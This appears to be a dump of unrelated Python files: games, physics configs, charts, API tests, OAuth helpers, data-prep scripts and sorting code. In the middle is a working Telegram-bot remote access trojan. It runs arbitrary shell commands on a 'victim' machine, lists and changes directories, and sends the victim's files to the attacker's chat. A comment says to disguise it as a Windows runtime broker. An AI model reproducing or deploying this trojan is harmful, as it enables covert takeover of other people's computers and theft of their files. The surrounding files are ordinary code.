def play1_com(self):
n = choice([0,1,2,3,4,5])
print(n)
sleep(1)
if self.game==True:
self.display2()
self.insert(n,self.p1)
def play2(self):
n = choice([0,1,2,3,4,5])
print(n)
sleep(1)
if self.game==True:
self.display2()
self.insert(n,self.p2)
def cycle(self):
self.set_up()
mode = input('1.YOU vs COM\n2.COM vs COM: ')
if mode=='2':
while self.game==True:
self.play1_com()
self.play2()
else:
while self.game==True:
self.play1()
self.play2()
print('GAME OVER')
game = Game()
game.cycle()
|
486278
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("simpleAnalysis")
# initialize MessageLogger
process.load("FWCore.MessageLogger.MessageLogger_cfi")
#Take 2007H4TB geometry
#process.load("Configuration.EcalTB.2007TBH4GeometryXML_cfi");
process.load("Geometry.CMSCommonData.ecalhcalGeometryXML_cfi");
process.load("Geometry.CaloEventSetup.CaloGeometry_cff")
#process.load("Geometry.CaloEventSetup.EcalTrigTowerConstituents_cfi")
process.CaloGeometryBuilder.SelectedCalos = ['EcalEndcap']
process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(int(10000)))
process.source = cms.Source("PoolSource",
# untracked vstring fileNames = {'rfio:/castor/cern.ch/cms/archive/ecal/h4tb.pool-cmssw-SM12/h4b.00015217.A.0.0.root'}
fileNames = cms.untracked.vstring('file:hits.root')
)
process.simple2007H4TBanalysis = cms.EDAnalyzer("EcalSimple2007H4TBAnalyzer",
rootfile = cms.untracked.string('ecalSimple2007H4TBAnalysis.root'),
eventHeaderProducer = cms.string('ecalTBunpack'),
hitProducer = cms.string('ecal2007TBWeightUncalibRecHit'),
digiCollection = cms.string('eeDigis'),
tdcRecInfoCollection = cms.string('EcalTBTDCRecInfo'),
digiProducer = cms.string('ecalTBunpack'),
hitCollection = cms.string('EcalUncalibRecHitsEE'),
hodoRecInfoProducer = cms.string('ecal2006TBHodoscopeReconstructor'),
eventHeaderCollection = cms.string(''),
hodoRecInfoCollection = cms.string('EcalTBHodoscopeRecInfo'),
tdcRecInfoProducer = cms.string('ecal2007H4TBTDCReconstructor')
)
process.p = cms.Path(process.simple2007H4TBanalysis)
|
486280
|
from pudzu.charts import *
from pudzu.sandbox.bamboo import *
# ----------------------
# 40 under 40 grid chart
# ----------------------
df = pd.read_csv("datasets/40under40.csv")
categories = remove_duplicates(df['category'])
data = pd.DataFrame([[dict(row) for _,row in df[df['category'] == cat].iterrows()] for cat in categories], index=categories)
default_img = "https://s-media-cache-ak0.pinimg.com/736x/0d/36/e7/0d36e7a476b06333d9fe9960572b66b9.jpg"
def process(d):
return Image.from_column([
Image.from_url_with_cache(d.get("image_url", default_img)).crop_to_aspect(100, 100, (0.5, 0.2)).resize_fixed_aspect(width=160),
Image.from_text(d['name'], arial(12, bold=True), padding=(2, 5, 2, 0), fg="white", bg="black"),
Image.from_text("{}, {}".format(d['age'], d['cause']), font("arial", 12), padding=(2,1,2,0), fg="white", bg="black")
])
title = Image.from_column([
Image.from_text("40 under 40: historic figures who died young", arial(48, bold=True), fg="white", bg="black"),
Image.from_text("“It is a sobering thought, for example, that when Mozart was my age, he had been dead for two years.” — <NAME>", arial(24), max_width=750, fg="white", bg="black")
], bg="black").pad((0,25), "black")
footer = Image.from_row([
Image.from_text("* ages and death causes from Wikipedia.", font=arial(14), fg="white", bg="black", padding=5),
Image.from_text("/u/Udzu", font("arial", 14), fg="white", bg="black", padding=5).pad((1,1,0,0), "white")
], bg="black")
grid = grid_chart(data, process, padding=5, col_label=None, label_font=arial(20, bold=True), bg="black", title=title).pad((0,0,10,0), "black")
img = Image.from_column([grid, footer], bg="black", xalign=1, padding=5)
img.save("output/40under40.png")
|
486315
|
from .base import BaseCFObject
class Output(BaseCFObject):
top_level_key = 'Outputs'
task_batch_resource_attr = 'batch_outputs'
|
486329
|
from __future__ import absolute_import, division, print_function
import telnyx
TEST_RESOURCE_ID = "1293384261075731499"
class TestAddress(object):
def test_is_listable(self, request_mock):
resources = telnyx.Address.list()
request_mock.assert_requested("get", "/v2/addresses")
assert isinstance(resources.data, list)
assert isinstance(resources.data[0], telnyx.Address)
def test_is_retrievable(self, request_mock):
resource = telnyx.Address.retrieve(TEST_RESOURCE_ID)
request_mock.assert_requested("get", "/v2/addresses/%s" % TEST_RESOURCE_ID)
assert isinstance(resource, telnyx.Address)
def test_is_creatable(self, request_mock):
resource = telnyx.Address.create(
name="my-profile",
business_name="Acme Inc",
country_code="US",
street_address="311 W Superior St",
first_name="John",
last_name="Doe",
locality="Chicago",
)
request_mock.assert_requested("post", "/v2/addresses")
assert isinstance(resource, telnyx.Address)
def test_is_deletable(self, request_mock):
resource = telnyx.Address.retrieve(TEST_RESOURCE_ID)
resource.delete()
request_mock.assert_requested("delete", "/v2/addresses/%s" % TEST_RESOURCE_ID)
|
486331
|
from PyObjCTools import NibClassBuilder, AppHelper
NibClassBuilder.extractClasses("MainMenu")
import AppController
AppHelper.runEventLoop()
|
486340
|
from pydantic import Field
from typing import Optional
from datetime import date, datetime, timedelta
from seedwork.domain.rules import BusinessRule
from modules.bidding.domain.value_objects import Bid
from seedwork.domain.value_objects import Money
class PlacedBidMustBeGreaterThanCurrentWinningBid(BusinessRule):
__message = "Placed bid must be greater than {current_price}"
bid: Bid
current_price: Money
def is_broken(self) -> bool:
return self.bid.price <= self.current_price
def get_message(self) -> str:
return self.__message.format(current_price=self.current_price)
class BidCanBeRetracted(BusinessRule):
__message = "Bid cannot be retracted"
listing_ends_at: datetime
bid_placed_at: datetime
now: datetime = Field(default_factory=datetime.utcnow)
def is_broken(self) -> bool:
time_left_in_listing = self.now - self.listing_ends_at
time_since_placed = self.now - self.bid_placed_at
less_than_12_hours_before_bidding_ends = time_left_in_listing < timedelta(
hours=12
)
less_than_1_hour_since_bid_was_placed = time_since_placed < timedelta(hours=1)
return (
less_than_12_hours_before_bidding_ends
and less_than_1_hour_since_bid_was_placed
)
class ListingCanBeCancelled(BusinessRule):
__message = "Listing cannot be cancelled"
time_left_in_listing: timedelta
no_bids_were_placed: int
def is_broken(self) -> bool:
can_be_cancelled = self.time_left_in_listing > timedelta(hours=12) or (
self.time_left_in_listing <= timedelta(hours=12)
and self.no_bids_were_placed
)
return not can_be_cancelled
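# A hypothetical usage sketch (not part of this module): assuming BusinessRule is a
# pydantic-style model that accepts its declared fields as keyword arguments, a rule
# is typically evaluated before mutating the aggregate, e.g.:
#
# from datetime import datetime, timedelta
#
# rule = BidCanBeRetracted(
#     listing_ends_at=datetime.utcnow() + timedelta(hours=2),
#     bid_placed_at=datetime.utcnow() - timedelta(hours=5),
# )
# if rule.is_broken():
#     raise ValueError(rule.get_message())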
|
486359
|
import os
from ttp import ttp
from typing import Optional, List, Dict
def get_template(
path: Optional[str] = None,
platform: Optional[str] = None,
command: Optional[str] = None,
yang: Optional[str] = None,
misc: Optional[str] = None,
):
"""
    Function to locate a template file and return its content
**Attributes**
* path (str) - OS path to template to load
* platform (str) - name of the platform to load template for
* command (str) - command to load template for
* yang (str) - name of YANG module to load template for
* misc (str) - OS path to template within repository misc folder
**Valid combinations of template location**
``path`` attribute is always more preferred
* ``path="./misc/foo/bar.txt"``
    * ``platform="cisco_ios", command="show version"``
* ``yang="ietf-interfaces", platform="cisco_ios"``
* ``misc="foo_folder/bar_template.txt"``
"""
# form path to template file
if path:
if path.strip().startswith("ttp://"):
path = path.strip()[6:]
elif platform and command:
platform = platform.lower()
command = command.lower()
command = command.replace("|", "pipe")
for symbol in [" "]:
platform = platform.replace(symbol, "_")
command = command.replace(symbol, "_")
path = "platform/{}_{}.txt".format(platform, command)
elif platform and yang:
platform = platform.lower()
yang = yang.lower()
for symbol in [" "]:
platform = platform.replace(symbol, "_")
yang = yang.replace(symbol, "_")
path = "yang/{}_{}.txt".format(yang, platform)
elif misc:
path = "misc/{}".format(misc)
else:
return None
template_filename = os.path.join(os.path.dirname(__file__), path)
# open template file and return content
with open(template_filename, "r") as f:
return f.read()
def parse_output(
data: str,
platform: Optional[str] = None,
command: Optional[str] = None,
path: Optional[str] = None,
yang: Optional[str] = None,
misc: Optional[str] = None,
structure: Optional[str] = "list",
template_vars: Optional[Dict] = {},
):
"""
Function to load template text and parse data provided
**Attributes**
* data (str) - data to parse
* path (str) - OS path to template to load
* platform (str) - name of the platform to load template for
* command (str) - command to load template for
* yang (str) - name of YANG module to load template for
* misc (str) - OS path to template within repository misc folder
* structure (str) - results structure list, dictionary or flat_list
* template_vars (dict) - variables to load in template object
**Valid combinations of template location**
``path`` attribute is always more preferred
* ``path="./misc/foo/bar.txt"``
    * ``platform="cisco_ios", command="show version"``
* ``yang="ietf-interfaces", platform="cisco_ios"``
* ``misc="foo_folder/bar_template.txt"``
"""
# get template text
template = get_template(
platform=platform, command=command, path=path, yang=yang, misc=misc
)
# create parser object
parser = ttp(data=data, template=template, vars=template_vars)
# parse and return results
parser.parse(one=True)
return parser.result(structure=structure)
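if __name__ == "__main__":
    # Minimal usage sketch (illustrative only). It assumes the repository ships a
    # "platform/cisco_ios_show_version.txt" template next to this module; the CLI
    # output below is dummy data.
    sample_output = """
Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 15.0(2)SE4
"""
    parsed = parse_output(
        data=sample_output,
        platform="cisco_ios",
        command="show version",
    )
    print(parsed)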
|
486437
|
from django.contrib import admin
from . import models
from django.conf import settings
admin.site.register(models.OfferCategory)
class OfferAdmin(admin.ModelAdmin):
if settings.MULTI_VENDOR:
list_display = ['title', 'total_vendors', 'starts_from', 'ends_at']
list_filter = ('vendor',)
else:
list_display = ['title', 'create_at', 'starts_from', 'ends_at']
list_per_page = 25
search_fields = ['title', 'description', 'ends_at']
readonly_fields = ['big_banner_tag', 'small_banner_tag']
# autocomplete_fields = ['category']
admin.site.register(models.Offer, OfferAdmin)
|
486461
|
import pytest
# TODO: Move these fixtures to integration tests
from great_expectations.data_context.util import file_relative_path
@pytest.fixture
def bobster_columnar_table_multi_batch_normal_mean_5000_stdev_1000():
verbose_profiler_config_file_path: str = file_relative_path(
__file__, "bobster_user_workflow_verbose_profiler_config.yml"
)
verbose_profiler_config: str
with open(verbose_profiler_config_file_path) as f:
verbose_profiler_config = f.read()
expectation_suite_name_bootstrap_sampling_method: str = (
"bobby_columnar_table_multi_batch_bootstrap_sampling_method"
)
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_mean_value: int = (
5000
)
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_std_value: float = (
1.0e3
)
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_num_stds: float = (
3.00
)
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_min_value_mean_value: int = round(
float(
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_mean_value
)
- (
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_num_stds
* my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_std_value
)
)
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_max_value_mean_value: int = round(
float(
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_mean_value
)
+ (
my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_num_stds
* my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_std_value
)
)
return {
"profiler_config": verbose_profiler_config,
"test_configuration_bootstrap_sampling_method": {
"expectation_suite_name": expectation_suite_name_bootstrap_sampling_method,
"expect_table_row_count_to_be_between_mean_value": my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_mean_value,
"expect_table_row_count_to_be_between_min_value_mean_value": my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_min_value_mean_value,
"expect_table_row_count_to_be_between_max_value_mean_value": my_row_count_range_rule_expect_table_row_count_to_be_between_expectation_max_value_mean_value,
},
}
|
486482
|
import telebot, os
from telebot.types import Message as tele_message
from subprocess import check_output
# root_dir = os.path.dirname(__file__)
API_KEY = 'your_bot_key/token'
CHAT_ID = 0 # int - attacker's user id
# to find user id, start the bot, and message this bot with /start
# password = 'password' // password is reserved for future work
help_message = '''
Remote Code Executor BOT
Written by <NAME>
https://github.com/dmdhrumilmistry
-------------------------
command description
-------------------------
/start get chat id and user details
/help get help menu
/exec execute command on victim's machine
/cd <path> change directory
/ls list file and folders of current working directory
/download download file from the victims machine to attacker's via telegram chat
'''
bot = telebot.TeleBot(API_KEY)
def get_victim():
return check_output("whoami",shell=True).decode("utf-8")
def inform_attacker():
'''
informs attacker that the victim machine is up
'''
message = f'{get_victim()} has been pawned and up'
bot.send_message(CHAT_ID, text=message)
def get_user_details(message:tele_message):
'''
returns messenger's details
'''
return f'ID : {message.from_user.id}\n Name :{message.from_user.full_name}\n[UserName] {message.from_user.username}\nIS BOT : {message.from_user.is_bot}'
def validate_request(message:tele_message) -> bool:
'''
returns True is if request is from hacker, else False
'''
if message.from_user.id != int(CHAT_ID):
alert_message = f'[!] Intruder Alert!!\n{get_user_details(message)}\nTried Command : {message.text}\n\nDetailed Information :{message}'
bot.send_message(chat_id=CHAT_ID, text=alert_message)
bot.send_message(chat_id=message.from_user.id, text='Not Authorized !!')
return False
return True
@bot.message_handler(commands=['start'])
def start(message:tele_message):
'''
start conversation
'''
chat_id = message.chat.id
reply_message = get_user_details()
bot.send_message(chat_id, reply_message)
if CHAT_ID:
bot.send_message(CHAT_ID, reply_message)
@bot.message_handler(commands=['exec'])
def execute(message:tele_message):
'''
executes and returns result to the attacker
'''
if not validate_request(message):
return
cmd = message.text.split('/exec')[-1].strip()
try:
result = check_output(cmd, shell=True).decode('utf-8')
except Exception as e:
result = f'Exception Occurred : {e}'
bot.send_message(chat_id=CHAT_ID, text=result)
@bot.message_handler(commands=['help'])
def help(message:tele_message):
'''
prints help
'''
if validate_request(message):
bot.send_message(chat_id=CHAT_ID, text=help_message)
@bot.message_handler(commands=['cd'])
def cd(message:tele_message):
'''
change current working directory
'''
cd_dir = message.text.split('/cd')[-1].strip()
if not validate_request(message):
return
os.chdir(cd_dir)
bot.send_message(CHAT_ID, text=f'Current Directory : {os.getcwd()}')
@bot.message_handler(commands=['ls'])
def ls(message:tele_message):
'''
replies with list of all the folders and files in the dir to the attacker
'''
if not validate_request(message):
return
dirs = '\n'.join(os.listdir('.'))
bot.send_message(chat_id=CHAT_ID, text=dirs)
@bot.message_handler(commands=['download'])
def download_file(message:tele_message):
'''
downloads file from victim's machine to attacker's machine
'''
if not validate_request(message):
return
file_path = message.text.split('/download')[-1].strip()
if os.path.isfile(file_path):
with open(file_path, 'rb') as file:
file_data = file.read()
bot.send_document(chat_id=CHAT_ID, data=file_data, caption=f'[*] {file_path} downloaded from {get_victim()}')
else:
bot.send_message(chat_id=CHAT_ID, text=f'[!] {file_path} does not exists.')
def start_bot():
'''
starts bot and informs hacker that victim's machine is up
'''
inform_attacker()
bot.polling()
if __name__ == '__main__':
# for windows create malware with runtime broker
# while packaging remove print statements
start_bot()
|
486484
|
import csv
from core.nn.token_mapper import RegexTokenMapping, ExactTokenMapping, TokenMapper, HashTokenMapping
from core.utils.core_nlp import SimpleSentence
from core.utils.data import NearNeighborLookup
from core.vectorspace.word_embedding import Glove
import json
import random
dataset_file = "/home/justin/Eloquent/Datasets/idk/idkdataset.tsv"
input_file = "/home/justin/Eloquent/Datasets/idk/idkdatasettest_small.tsv"
output_file = "/home/justin/Eloquent/Datasets/idk/idk_dataset_specificity_test_in.jsonl"
bonus = 0.2
reward = 0.20
estimated_time = 75
datapoints_per_batch = 10
token_mappings = [
RegexTokenMapping("^[0-9]$", 3, "NUM_1"),
RegexTokenMapping("^[0-9]{2}$", 3, "NUM_2"),
RegexTokenMapping("^[0-9]{3}$", 3, "NUM_3"),
RegexTokenMapping("^[0-9]+$", 3, "NUM_MANY"),
RegexTokenMapping("^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$", 3, "EMAIL"),
ExactTokenMapping(["<SOS>", "<EOS>"]),
]
print('Adding {} token mappings'.format(len(token_mappings)))
glove = Glove.from_binary().with_new_token_mapper(
token_mapper=TokenMapper(token_mappings, [HashTokenMapping(10)])
)
question_list_pos = []
question_list_neg = []
do_sentiment = False
with open(dataset_file, "r") as f:
reader = csv.reader(f, delimiter="\t")
for line in reader:
if (not do_sentiment) or line[2] == "pos":
question_list_pos.append(line[0])
else:
question_list_neg.append(line[0])
sslist_pos = [SimpleSentence.from_text(sentence) for sentence in question_list_pos]
nns_pos = NearNeighborLookup.from_sentences(sslist_pos, glove)
if do_sentiment:
sslist_neg = [SimpleSentence.from_text(sentence) for sentence in question_list_neg]
nns_neg = NearNeighborLookup.from_sentences(sslist_neg, glove)
response_sets = []
with open(input_file, "r") as f:
reader = csv.reader(f, delimiter="\t")
for line in reader:
if (not do_sentiment) or line[2] == "pos":
neighbors = nns_pos.find_neighbors(SimpleSentence.from_text(line[0]), 2, ignore_self=True)
sentiment = "pos"
else:
neighbors = nns_neg.find_neighbors(SimpleSentence.from_text(line[0]), 2, ignore_self=True)
sentiment = "neg"
neighbors = [" ".join(entry.original_texts()) for entry in neighbors]
response_sets.append((line[0], neighbors, line[1], sentiment))
turk_inputs = []
i = 0
for response in response_sets:
prompts = response[1].copy()
prompts.append(response[0])
random.shuffle(prompts)
json_object = {
"id": i,
"prompts": prompts,
"response": response[2],
"correct": prompts.index(response[0]),
"sentiment": response[3]
}
turk_inputs.append(json_object)
i += 1
random.shuffle(turk_inputs)
with open(output_file, "w+") as f:
for i in range(len(response_sets)//datapoints_per_batch):
turk_input = turk_inputs[datapoints_per_batch * i: datapoints_per_batch * (i + 1)]
json_object = {
"input": turk_input,
"bonus": bonus,
"reward": reward,
"estimatedTime": estimated_time
}
f.write(json.dumps(json_object) + "\n")
|
486492
|
class Submarine:
depth = 0
horizontal_pos = 0
def down(self, depth):
self.depth += depth
def up(self, depth):
self.depth -= depth
def forward(self, distance):
self.horizontal_pos += distance
def get_depth(self):
return self.depth
def get_horizontal_pos(self):
return self.horizontal_pos
def dive(self, input):
with open(input, "r") as f:
for line in f:
(direction, value) = line.split(" ")
value = int(value)
if direction == "down":
self.down(value)
elif direction == "up":
self.up(value)
elif direction == "forward":
self.forward(value)
else:
raise Exception(f"Unknown direction!")
def get_Star1():
submarine = Submarine()
submarine.dive("input.txt")
result = submarine.get_depth() * submarine.get_horizontal_pos()
print(f"Result for first star: {result}")
class Aiming_Submarine:
depth = 0
horizontal_pos = 0
aim = 0
def down(self, depth):
self.aim += depth
def up(self, depth):
self.aim -= depth
def forward(self, distance):
self.horizontal_pos += distance
self.depth += distance * self.aim
def get_depth(self):
return self.depth
def get_horizontal_pos(self):
return self.horizontal_pos
def dive(self, input):
with open(input, "r") as f:
for line in f:
(direction, value) = line.split(" ")
value = int(value)
if direction == "down":
self.down(value)
elif direction == "up":
self.up(value)
elif direction == "forward":
self.forward(value)
else:
raise Exception(f"Unknown direction!")
def get_Star2():
submarine = Aiming_Submarine()
submarine.dive("input.txt")
result = submarine.get_depth() * submarine.get_horizontal_pos()
print(f"Result for second star: {result}")
get_Star1()
get_Star2()
|
486516
|
from datetime import datetime
import base64
import hashlib
import hmac
import logging
import requests
import time
import urlparse
from rmc.server.app import app
import rmc.server.api.api_util as api_util
import rmc.shared.util as util
# A long token normally lasts for 60 days
FB_FORCE_TOKEN_EXPIRATION_DAYS = 57
USED_AUTH_CODE_MSG = 'This authorization code has been used.'
def code_for_token(code, config, cmd_line_debug=False):
"""Returns a dictionary containing the user's Facebook access token and
seconds until it expires from now
See https://developers.facebook.com/blog/post/2011/05/13/how-to--handle-expired-access-tokens/
Right now, the resulting token is a short-lived token (~2 hours). But it's
possible that this is wrong and that it should be a long-term token
instead. See https://developers.facebook.com/bugs/341793929223330/
Args:
code: The code we get from their fb_signed_request
Returns {
'access_token': '<PASSWORD>',
'expires': 6200,
}
"""
# Since we're exchanging a client-side token, redirect_uri should be ''
params = {
'client_id': config['FB_APP_ID'],
'redirect_uri': '',
'client_secret': config['FB_APP_SECRET'],
'code': code,
}
resp = requests.get('https://graph.facebook.com/oauth/access_token',
params=params)
if resp.status_code != 200:
err = util.json_loads(resp.text)
if (err.get('error').get('message') == USED_AUTH_CODE_MSG and
err.get('error').get('code') == 100):
logging.info('code_for_token failed (%d) with text:\n%s' % (
resp.status_code, resp.text))
else:
logging.warn('code_for_token failed (%d) with text:\n%s' % (
resp.status_code, resp.text))
result = dict(urlparse.parse_qsl(resp.text))
if cmd_line_debug:
print "result dict:"
print result
return resp
return result
def get_access_token_info(access_token):
"""Returns info about the given Facebook access token.
Verifies that the access token was issued for Flow. This prevents an
attacker from hijacking a user's Flow account by providing a valid access
token issued for another FB app.
For return data, see (https://developers.facebook.com/docs/facebook-login
/manually-build-a-login-flow/#confirm)
"""
res = requests.get('https://graph.facebook.com/debug_token'
'?input_token=%s&access_token=%s|%s' % (
access_token,
app.config['FB_APP_ID'],
app.config['FB_APP_SECRET']))
if not res.ok or not res.json.get('data'):
logging.error('Failed verifying FB access token. FB response: %s' %
res.json)
raise api_util.ApiBadRequestError('Failed verifying FB access token.')
return res.json['data']
# TODO(Sandy): Find out how often a new token is issued
def token_for_long_token(short_token, config, cmd_line_debug=False):
"""
Returns a dictionary containing the user's long Facebook access token and
seconds until it expires from now
The resulting tokens should last 60 days. Though making the same request
within a short period of time (eg. minutes) won't result in a new token.
Args:
short_token: The short-lived token we're exchanging
Returns {
'access_token': 'token-<PASSWORD>-bl<PASSWORD>',
'expires': 5184000,
}
"""
# Since we're exchanging a client-side token, redirect_uri should be ''
params = {
'grant_type': 'fb_exchange_token',
'client_id': config['FB_APP_ID'],
'client_secret': config['FB_APP_SECRET'],
'fb_exchange_token': short_token,
}
resp = requests.get('https://graph.facebook.com/oauth/access_token',
params=params)
if resp.status_code != 200:
# TODO(Sandy): See if this is too verbose
logging.warn('token_for_long_token failed (%d) with text:\n%s' % (
resp.status_code, resp.text))
result = dict(urlparse.parse_qsl(resp.text))
if cmd_line_debug:
print "result dict:"
print result
return resp
return result
def base64_url_decode(inp):
padding_factor = (4 - len(inp) % 4) % 4
inp += '=' * padding_factor
return base64.b64decode(unicode(inp)
.translate(dict(zip(map(ord, u'-_'), u'+/'))))
def parse_signed_request(signed_request, secret):
"""
Returns a dict of the the Facebook signed request object
See https://developers.facebook.com/docs/authentication/signed_request/
"""
l = signed_request.split('.', 2)
encoded_sig = l[0]
payload = l[1]
sig = base64_url_decode(encoded_sig)
data = util.json_loads(base64_url_decode(payload))
if data.get('algorithm').upper() != 'HMAC-SHA256':
logging.error('Unknown algorithm during signed request decode')
return None
expected_sig = (hmac.new(secret, msg=payload, digestmod=hashlib.sha256)
.digest())
if sig != expected_sig:
return None
return data
# TODO(Sandy): Remove config parameter when Flask re-factoring is done
def get_fb_data(signed_request, config):
"""
Get FB access token and expiry information from the Facebook signed request
A long-lived token should be returned (60 days expiration), if everything
went smoothly.
Returns {
'access_token': '<PASSWORD>',
'expires_on': 5184000,
'fbid': 123456789,
}
"""
# Validate against Facebook's signed request
fbsr_data = parse_signed_request(signed_request, config['FB_APP_SECRET'])
# TODO(Sandy): Maybe move the validation somewhere else since it can raise
# an Exception
if fbsr_data is None or not fbsr_data.get('user_id'):
logging.warn('Could not parse Facebook signed request (%s)'
% signed_request)
raise Exception('Could not parse Facebook signed request (%s)'
% signed_request)
# Fetch long token from Facebook
# TODO(Sandy): Migrate to Flask sessions so null tokens won't be a problem
fb_access_token = None
fb_access_token_expiry_date = None
is_invalid = True
code = fbsr_data.get('code')
if code:
result_dict = code_for_token(code, config)
short_access_token = result_dict.get('access_token')
if short_access_token:
result_dict = token_for_long_token(short_access_token, config)
long_access_token = result_dict.get('access_token')
token_expires_in = result_dict.get('expires')
if long_access_token and token_expires_in:
fb_access_token = long_access_token
fb_access_token_expiry_date = datetime.fromtimestamp(
int(time.time()) + int(token_expires_in) - 10)
is_invalid = False
else:
logging.warn('Failed to exchange (%s) for long access token'
% short_access_token)
else:
logging.info('Failed to exchange code (%s) for token' % code)
else:
# Shouldn't happen, Facebook messed up
logging.warn('No "code" field in fbsr. Blame FB')
return {
'access_token': fb_access_token,
'expires_on': fb_access_token_expiry_date,
'fbid': fbsr_data['user_id'],
'is_invalid': is_invalid,
}
class FacebookOAuthException(Exception):
'''
Invalid Facebook token (expired or just plain invalid):
https://developers.facebook.com/blog/post/2011/05/13/how-to--handle-expired-access-tokens/
'''
pass
def get_friend_list(token):
'''
Return a list of fbids for the Facebook user associated with token
'''
fbid_list = []
params = {
'access_token': token,
}
url = 'https://graph.facebook.com/me/friends'
while url is not None:
resp = requests.get(url, params=params)
resp_dict = util.json_loads(resp.text)
if 'error' in resp_dict:
if resp_dict.get('error').get('type') == 'OAuthException':
raise FacebookOAuthException()
raise Exception(resp.text)
if 'data' in resp_dict:
for entry in resp_dict['data']:
fbid_list.append(entry['id'])
else:
raise Exception('"data" not in dict (%s)' % resp_dict)
url = resp_dict.get('paging', {}).get('next')
return fbid_list
|
486538
|
from setuptools import setup
setup(
name = "pocket", # pip install pocket
description = "api wrapper for getpocket.com",
#long_description=open('README.md', 'rt').read(),
# version
# third part for minor release
# second when api changes
# first when it becomes stable someday
version = "0.3.7",
author = '<NAME>',
author_email = "<EMAIL>",
url = 'http://github.com/tapanpandita/pocket/',
license = 'BSD',
    # as a practice, no need to hard-code versions unless you know the program won't
    # work unless the specific versions are used
install_requires = ["requests", ],
py_modules = ["pocket"],
zip_safe = True,
)
# TODO: Do all this and delete these lines
# register: Create an account on PyPI, store your credentials in ~/.pypirc:
#
# [pypirc]
# servers =
# pypi
#
# [server-login]
# username:<username>
# password:<<PASSWORD>>
#
# $ python setup.py register # one time only, will create pypi page for pocket
# $ python setup.py sdist --formats=gztar,zip upload # create a new release
#
|
486541
|
from django.db import models
class AnyFileField(models.FileField):
"""
The standard Django `~django.forms.FileField` with a `~django.forms.ClearableFileInput` widget.
"""
pass
class AnyImageField(models.ImageField):
"""
The standard Django `~django.forms.ImageField` with a `~django.forms.ClearableFileInput` widget.
"""
pass
|
486553
|
from pydantic import BaseModel
from typing import Dict
class Config(BaseModel):
conditions: Dict[str, str]
|
486567
|
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--remote', action='store_true', help='the code run on a server')
parser.add_argument('--num-gpu', type=int, default=0, help='the number of the gpu to use')
parser.add_argument('--epochs', type=int, default=200, help='train epochs')
parser.add_argument('--batch-size', type=int, default=16, help='batch size')
parser.add_argument('--filename', type=str, default='pems04')
parser.add_argument('--train-ratio', type=float, default=0.6, help='the ratio of training dataset')
parser.add_argument('--valid-ratio', type=float, default=0.2, help='the ratio of validating dataset')
parser.add_argument('--his-length', type=int, default=12, help='the length of history time series of input')
parser.add_argument('--pred-length', type=int, default=12, help='the length of target time series for prediction')
parser.add_argument('--sigma1', type=float, default=0.1, help='sigma for the semantic matrix')
parser.add_argument('--sigma2', type=float, default=10, help='sigma for the spatial matrix')
parser.add_argument('--thres1', type=float, default=0.6, help='the threshold for the semantic matrix')
parser.add_argument('--thres2', type=float, default=0.5, help='the threshold for the spatial matrix')
parser.add_argument('--lr', type=float, default=2e-3, help='learning rate')
parser.add_argument('--log', action='store_true', help='if write log to files')
args = parser.parse_args()
|
486569
|
from itertools import chain
def radixsort(lst):
is_sorted = lambda l: all([a < b for a, b in zip(l[:-1], l[1:])])
shift = 1
zeroes = []
ones = []
while not is_sorted(lst.lst):
orig = lst.lst[:]
while len(orig) != 0:
# take an item out of the list
item = orig.pop(0)
# put it in the right bucket
if (item.i & shift) == 0:
zeroes.append(item)
else:
ones.append(item)
# copy the items back into the main list
for j, item in enumerate(chain(zeroes, orig, ones)):
lst[j] = item
# for a more simple graph, comment out the line below
lst.log()
#
if is_sorted(lst):
return
lst.log()
shift = shift << 1
zeroes[:] = []
ones[:] = []
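if __name__ == "__main__":
    # Simplified standalone sketch of the same idea (illustrative only): an LSD
    # radix sort over plain ints, one bit per pass, without the visualization
    # wrapper (lst.lst / lst.log / item.i) that radixsort() above relies on.
    def radixsort_ints(values):
        shift = 1
        max_value = max(values) if values else 0
        while shift <= max_value:
            zeroes = [v for v in values if (v & shift) == 0]
            ones = [v for v in values if (v & shift) != 0]
            values = zeroes + ones      # stable partition: zero-bit items keep their order, first
            shift <<= 1
        return values

    print(radixsort_ints([5, 3, 8, 1, 9, 2, 7]))   # [1, 2, 3, 5, 7, 8, 9]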
|
486580
|
import site # so that ai4water directory is in path
import unittest
import os
import sys
ai4_dir = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0])))
site.addsitedir(ai4_dir)
import numpy as np
import pandas as pd
from ai4water.preprocessing.transformations import Transformation
from ai4water.tf_attributes import tf
from ai4water.datasets import busan_beach
if 230 <= int(''.join(tf.__version__.split('.')[0:2]).ljust(3, '0')) < 250:
from ai4water.functional import Model
print(f"Switching to functional API due to tensorflow version {tf.__version__}")
else:
from ai4water import Model
df = pd.DataFrame(np.concatenate([np.arange(1, 10).reshape(-1, 1), np.arange(1001, 1010).reshape(-1, 1)], axis=1),
columns=['data1', 'data2'])
def build_and_run(x_transformation, y_transformation,
data, inputs, outputs):
model = Model(model="RandomForestRegressor",
input_features=inputs,
output_features=outputs,
x_transformation=x_transformation,
y_transformation=y_transformation,
verbosity=0)
model.fit(data=data)
x, y = model.training_data(key='junk')
#pred, pred = model.inverse_transform(y, y, key='junk')
pred, index = model.dh_.deindexify(y, key='junk')
pred = pd.DataFrame(pred.reshape(len(pred), model.num_outs), columns=outputs, index=index).sort_index()
return pred
def run_method1(method,
cols=None,
data=None,
**kwargs):
normalized_df1, scaler = Transformation(method=method,
features=cols,
**kwargs)(data,
'fit_transform',
return_key=True)
denormalized_df1 = Transformation(features=cols,
)(normalized_df1,
'inverse',
scaler=scaler['scaler'])
return normalized_df1, denormalized_df1
def run_method2(method,
data=None,
index=None,
**kwargs):
if index:
